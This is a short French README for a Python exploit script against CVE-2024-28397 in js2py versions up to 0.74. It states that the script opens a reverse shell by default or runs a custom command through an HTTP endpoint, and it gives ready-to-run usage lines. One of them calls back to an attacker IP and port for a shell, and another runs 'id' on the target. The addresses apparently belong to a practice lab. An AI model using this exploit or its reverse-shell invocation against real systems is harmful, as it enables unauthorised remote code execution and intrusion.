
Script d'exploitation Python pour CVE-2024-28397 ciblant js2py <= v0.74. Prend en charge le reverse shell et l'exécution de commandes personnalisées via un point de terminaison HTTP.
Charge utile de reverse shell par défaut et argument de commande optionnel autorisé
L'exploit fonctionne pour js2py <= v0.74
requests (pip install requests)Reverse shell :
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
Commande personnalisée :
python exploit.py 10.129.227.108 /run_code --cmd "id"